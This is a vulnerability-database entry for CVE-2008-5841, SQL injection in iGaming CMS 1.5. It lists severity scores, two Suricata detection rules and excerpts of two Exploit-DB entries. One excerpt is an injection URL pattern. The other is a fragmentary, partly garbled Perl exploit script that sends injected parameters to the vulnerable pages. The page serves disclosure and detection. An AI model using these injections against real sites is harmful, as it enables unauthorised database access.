CVE-2008-5841
published 2009-01-05CVE-2008-5841: Multiple SQL injection vulnerabilities in iGaming 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the browse parameter to (1)…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.0th percentile
Multiple SQL injection vulnerabilities in iGaming 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the browse parameter to (1) previews.php and (2) reviews.php, and the (3) id parameter to index.php in a viewarticle action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| igamingcms | igaming_cms | <= 1.5 | — |
| igamingcms | igaming_cms | — | — |
| igamingcms | igaming_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection
suricata·2010-07-30
CVE-2008-5841 ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection
ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/previews.php?"; nocase; content:"browse="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,2008-5841; reference:bugtraq,31340; reference:url,milw0rm.com/exploits/6540; classtype:web-application-attack; sid:2009068; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5841, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_04, mitre_tactic_id TA0001,
Suricata
ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection
suricata·2010-07-30
CVE-2008-5841 ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection
ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/reviews.php?"; nocase; content:"browse="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,2008-5841; reference:bugtraq,31340; reference:url,milw0rm.com/exploits/6540; classtype:web-application-attack; sid:2009069; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5841, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_04, mitre_tactic_id TA0001, mi
Exploit-DB
iGaming CMS - Multiple SQL Injections
exploitdb·2010-08-27
CVE-2008-5841 iGaming CMS - Multiple SQL Injections
iGaming CMS - Multiple SQL Injections
---
############################################################################
# #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities #
# #
# Date: 27/08/2010 #
# #
# Author: Sweet #
# #
# Contact : [email protected] #
# #
# Software Link: http://www.igamingcms.com/ #
# #
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5 #
# #
# Version:1.5 #
# #
# Tested on: WinXp sp3 #
# #
# Risk : hight #
# #
# #
# Description : iGaming CMS is a content management #
# system designed for gaming websites. #
# #
# #
# #
############################################################################
1-SQL injection:
http://www.example.com/igamingpath/games.php?order=1[SQLi]§[email protected]&sort=desc
2-Blind injection:
http://ww
Exploit-DB
iGaming CMS 1.5 - Multiple SQL Injections
exploitdb·2008-09-23
CVE-2008-5841 iGaming CMS 1.5 - Multiple SQL Injections
iGaming CMS 1.5 - Multiple SQL Injections
---
#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(.+?)$/)
{
print "[?] iGaming CMS get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(.+?)%/;
die "$1\n" if $two->content =~ /%(.+?)%/;
die "$1\n" if $xxx->content =~ /%(.+?)%/;
}
else
{
die "[+] Exploit Failed!\n";
}
}
# milw0rm.com [2008-09-23]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4867http://www.securityfocus.com/bid/31340https://exchange.xforce.ibmcloud.com/vulnerabilities/45366https://www.exploit-db.com/exploits/6540http://securityreason.com/securityalert/4867http://www.securityfocus.com/bid/31340https://exchange.xforce.ibmcloud.com/vulnerabilities/45366https://www.exploit-db.com/exploits/6540
2009-01-05
Published